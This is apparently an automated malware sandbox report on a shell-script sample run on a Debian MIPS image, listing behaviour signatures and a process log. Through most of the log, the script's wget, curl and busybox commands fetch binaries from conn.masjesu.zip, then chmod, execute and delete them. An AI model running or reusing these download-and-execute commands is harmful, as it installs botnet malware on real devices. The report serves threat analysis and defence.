Analysis Overview
SHA256
4744936aed410f2c0f2415c7e43a23fa5098f31fb71ed1824b2bb0a6441045f1
Threat Level: Shows suspicious behavior
The file 844b57641f1b3245860dd2c581f61721.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-24 01:27
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 01:27
Reported
2024-11-24 01:29
Platform
debian9-mipsbe-20240611-en
Max time kernel
103s
Max time network
132s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | N/A |
| N/A | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | N/A |
| N/A | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | N/A |
| N/A | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | N/A |
| N/A | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | N/A |
| N/A | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | N/A |
| N/A | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | N/A |
| N/A | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | N/A |
| N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | N/A |
| N/A | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | N/A |
| N/A | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | N/A |
| N/A | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | N/A |
| N/A | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | N/A |
| N/A | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | N/A |
| N/A | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | N/A |
| N/A | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | N/A |
| N/A | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | N/A |
| N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | N/A |
| N/A | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | N/A |
| N/A | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | N/A |
| N/A | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | N/A |
| N/A | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | N/A |
| N/A | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | N/A |
| N/A | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | N/A |
| N/A | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | N/A |
| N/A | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an | /usr/bin/curl | N/A |
| File opened for modification | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ | /usr/bin/curl | N/A |
Processes
/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh
[/tmp/dcfc6173c88c9e2c20c68ca8d07b5c619377cb8f5c8535dc36bc8ebdb2d79ce6.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/chmod
[chmod 777 eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/tmp/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5
[./eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/bin/rm
[rm eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/chmod
[chmod 777 RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/tmp/RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M
[./RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/bin/rm
[rm RtuY0KFsV3sKLoKUuit5BS0KVw1HUzrb0M]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/chmod
[chmod 777 WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/tmp/WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm
[./WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/bin/rm
[rm WFsJzd3MTADgr8H1zX1bLXr5UxLk8BHjIm]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/chmod
[chmod 777 KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/tmp/KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an
[./KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/bin/rm
[rm KdzGrrzQTjG6WEry1evxaFAbCGqB8CY1an]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/chmod
[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ
[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/rm
[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/chmod
[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh
[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/rm
[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/chmod
[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC
[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/rm
[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/chmod
[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2
[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/rm
[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/chmod
[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q
[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/rm
[rm YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/chmod
[chmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB
[./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/bin/rm
[rm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/chmod
[chmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a
[./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/bin/rm
[rm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/chmod
[chmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ
[./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/bin/rm
[rm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/chmod
[chmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo
[./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/bin/rm
[rm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/chmod
[chmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R
[./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/bin/rm
[rm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/chmod
[chmod 777 s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/tmp/s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ
[./s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/bin/rm
[rm s7nnG7pI0YWYxqhrRSEQgXzl9QC9eA9lYJ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/chmod
[chmod 777 alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/tmp/alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh
[./alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/bin/rm
[rm alGoQF3ZHkEdk9shSxF7lB5v0KelaITCvh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/chmod
[chmod 777 at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/tmp/at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC
[./at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/bin/rm
[rm at22H3wZIkynuz9kfEVA1NFlXYB4Py19JC]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/chmod
[chmod 777 lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/tmp/lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2
[./lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/bin/rm
[rm lyaqchKXVjJ3ec2cr1Ritt2ttu82rIFei2]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/chmod
[chmod 777 YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/tmp/YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q
[./YKZoWdde7eirfbFLBiPFc1Hwbt57bwcy5q]
/bin/rm
